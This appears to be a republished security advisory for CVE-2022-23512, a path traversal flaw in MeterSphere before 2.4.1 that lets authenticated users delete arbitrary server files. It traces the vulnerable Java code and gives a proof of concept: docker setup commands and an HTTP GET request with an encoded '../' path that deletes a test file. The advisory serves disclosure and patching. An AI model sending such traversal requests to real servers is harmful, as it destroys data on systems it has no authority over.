Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-23512: Path Injection in Metersphere leads to Arbitrary File Delete

MeterSphere is a one-stop open source continuous testing platform. Versions prior to 2.4.1 are vulnerable to Path Injection in ApiTestCaseService::deleteBodyFiles which takes a user-controlled string id and passes it to ApiTestCaseService, which uses the user-provided value (testId) in new File(BODY_FILE_DIR + “/” + testId), being deleted later by file.delete(). By adding some camouflage parameters to the url, an attacker can target files on the server. The vulnerability has been fixed in v2.4.1.

CVE
#csrf#vulnerability#git#java#auth#docker#maven

Package

maven io.metersphere:metersphere (Maven)

Affected versions

< 2.4.1

Summary

A Path Injection in ApiTestCaseService::deleteBodyFiles allows any authenticated user to delete arbitrary files on the server.

Details

Metersphere’s ApiTestCaseController loads a /delete/{id} endpoint which takes a user-controlled string id and passes it to ApiTestCaseService’s delete method.

// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/controller/definition/ApiTestCaseController.java#L127 @GetMapping(“/delete/{id}”) … public void delete(@PathVariable String id) { apiTestCaseService.delete(id); }

ApiTestCaseService’s delete method passes the former id (now testId) to ApiTestCaseService’s deleteBodyFiles.

// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/service/definition/ApiTestCaseService.java#L331 public void delete(String testId) { … deleteBodyFiles(testId); … }

Which uses the user-provided value (testId) in new File(BODY_FILE_DIR + “/” + testId), being deleted later by file.delete().

// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/service/definition/ApiTestCaseService.java#L365 public void deleteBodyFiles(String testId) { File file = new File(BODY_FILE_DIR + “/” + testId); FileUtil.deleteContents(file); if (file.exists()) { file.delete(); } }

Proof of Concept

  1. Log in with an account (can be non-administrator)
  2. Create a file that the PoC will delete:

docker exec -it $(docker ps -q --filter “name=ms-server”) touch /tmp/DELETE_ME docker exec -it $(docker ps -q --filter “name=ms-server”) ls /tmp/DELETE_ME

  1. Send the following request replacing the SESSION cookie and CSRF-TOKEN header:

    GET /api/testcase/delete/…%2F…%2F…%2F…%2Ftmp%2FDELETE_ME HTTP/1.1 Host: 127.0.0.1:8081 CSRF-TOKEN: <CSRF-TOKEN> Cookie: SESSION=<SESSION-COOKIE>

  1. Verify that the file was deleted:

docker exec -it $(docker ps -q --filter “name=ms-server”) ls /tmp/DELETE_ME

Patches

The vulnerability has been fixed in v2.4.1.

  • b5b4c51: No longer can arbitrary files be deleted.

Workarounds

It is recommended to upgrade the version to v2.4.1.

For more information

If you have any questions or comments about this advisory, please open an issue.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907